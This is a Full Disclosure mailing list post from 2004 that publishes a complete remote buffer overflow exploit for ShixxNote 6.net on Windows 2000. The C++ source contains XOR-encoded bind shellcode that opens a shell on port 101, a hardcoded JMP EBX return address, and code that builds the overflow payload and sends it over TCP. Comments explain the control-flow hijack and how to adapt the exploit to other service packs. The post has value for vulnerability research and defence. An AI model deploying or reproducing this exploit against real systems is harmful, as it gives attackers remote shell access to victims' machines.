Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Windows 2000 Remote Buffer Overflow by class101
From: "class 101" <class101 () phreaker net>
Date: Fri, 22 Oct 2004 23:12:57 +0200

to correct you this is for ShixxNote 6.net, not so big app than Win2K, do not send me so many credits ^^

/*

ShixxNote 6.net buffer overflow exploit v0.1

Public exploit overflows only Win2K systems, else crashs.

Exploit code by class101 [at] DFind.kd-team.com 

Bind a shellcode to the port 101.

Thanx to Luigi Auriemma(aluigi () altervista org) for the bug discovery

Thanx to HDMoore and Metasploit.com for their kickass ASM work.

Why Win2k only?

After some days of debugging on it , I finally figured out how to exploit this 

hole, this public overflow method works only on Win2k, using the 

JMP EBX from comdlg32.dll from Win2k SP4 english.

Because on WinXP , the register EBX points to a NULL address, this is not exploitable

even if you update the JMP EBX, not exploitable VIA THIS WAY on XP I mean OK!.

How do I did then on Win2k?

I overwritte EIP with a JMP EBX, EBX is a perfect register because it points directly

to my buffer, but problem, it points 4 bytes only before EIP, quite short...

But enough to say him to jump ~80 bytes higher.

Now i have enough space to adjust my shellcode to ESI and to finally jump to it...

That's why on WinXP (and maybe others , havent tested) this doesnt works because EBX isnt 

available.

Not happy? code yours or get a pvt version ;p

How do I update to Win2k SP1 Dutch for example ?

Grab a JMP EBX address in comdlg32.dll from this OS and update the code.

Take a look at www.KD-Team.com, really nice peaces of code to find. Good job DiabloHorn ;)

Take a look at www.GovernmentSecurity.org, good public place if you ignore all lame threads ^^ and all 

retarded, without to name them to not add credits to their stupidity....

Greets cp, and sorry jester ....

*/

#include "winsock2.h"

#include "fstream.h"

#pragma comment(lib, "ws2_32")

//BIND shellcode port 101, XORed 0x88, thanx HDMoore. 

char scode[] =

"\xEB"

"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"

"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"

"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"

"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"

"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"

"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"

"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"

"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"

"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"

"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"

"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"

"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"

"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"

"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"

"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"

"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"

"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"

"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"

"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"

"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"

"\x58\x68\x61\x63\x6B\x90";

/*

//Execute regedit.exe, XORed 0x88, hardcoded Win2k SP4 English

char scode2[] = "\xEB"

"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"

"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"

"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD"

"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD"

"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xB7\xC8\xD0\xF4\x77\x58\xE0\x89"

"\x88\x88\x88\x30\xF5\x86\xD0\xF4\x77\x58\x68\x61\x63\x6B\x90";

*/

static char payload[5000];

char jmpebxw2k[]="\x79\x3c\xb6\x76"; //JMP EBX - comdlg32.dll - Win2k SP4 English

void usage(char* us);

WSADATA wsadata;

void ver();

int main(int argc,char *argv[])

{

ver();

if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}

if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}

int ip=htonl(inet_addr(argv[1])), sz, port, sizev, sizew, sizex, sizey, sizez, v, w, x, y, z;

if (argc==3){port=atoi(argv[2]);}

else port=2000;

SOCKET s;

struct fd_set mask;

struct timeval timeout; 

struct sockaddr_in server;

s=socket(AF_INET,SOCK_STREAM,0);

if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}

server.sin_family=AF_INET;

server.sin_addr.s_addr=htonl(ip);

server.sin_port=htons(port);

WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);

timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);

switch(select(s+1,NULL,&mask,NULL,&timeout))

{

case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}

case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}

default:

if(FD_ISSET(s,&mask))

{

cout<<"[+] connected, constructing the payload..."<<endl;

Sleep(1000);

sizev=5;

sizew=88;

sizey=800-sizeof(scode);

sizex=5;

sizez=20;

sz=sizev+sizew+sizex+sizez+sizeof(scode)+sizey;

memset(payload,0,sizeof(payload));

strcat(payload,"~~");

for (v=0;v<sizev;v++){strcat(payload,"\x61");}

strcat(payload,"\x66\x8b\xf3");

strcat(payload,"\x66\x83\xc6\x09");

strcat(payload,"\xff\xe6");

for (w=0;w<sizew;w++){strcat(payload,"\x61");}

strcat(payload,"\xeb");

strcat(payload,"\x9d\x61\x61");

strcat(payload,jmpebxw2k);

for (x=0;x<sizex;x++){strcat(payload,"\x90");} 

strcat(payload,scode);

for (y=0;y<sizey;y++){strcat(payload,"\x61");} 

for (z=0;z<sizez;z++){strcat(payload,"~");} 

if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly 
rebooted."<<endl;return -1;}

cout<<"[+] size of payload: "<<sz<<endl; 

cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;

return 0;

}

}

closesocket(s);

WSACleanup();

return 0;

}



void usage(char* us) 

{ 

cout<<"USAGE: 101_shixx.exe Ip Port\n"<<endl;

cout<<"NOTE: "<<endl;

cout<<" The port 2000 is default if no port specified."<<endl;

cout<<" The exploit bind a shellcode to the port 101."<<endl;

cout<<" Public version - Win2k systems only"<<endl;

cout<<" Update the JMP address for another SP/Language"<<endl;

return;

} 

void ver()

{ 

cout<<endl;

cout<<" "<<endl;

cout<<" ===================================================[v0.1]===="<<endl;

cout<<" =======ShixxNote 6.net, Remote Buffer Overflow Exploit======="<<endl;

cout<<" =====coded by class101===========[DFind.kd-team.com 2004]===="<<endl;

cout<<" ============================================================="<<endl;

cout<<" "<<endl;

}


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault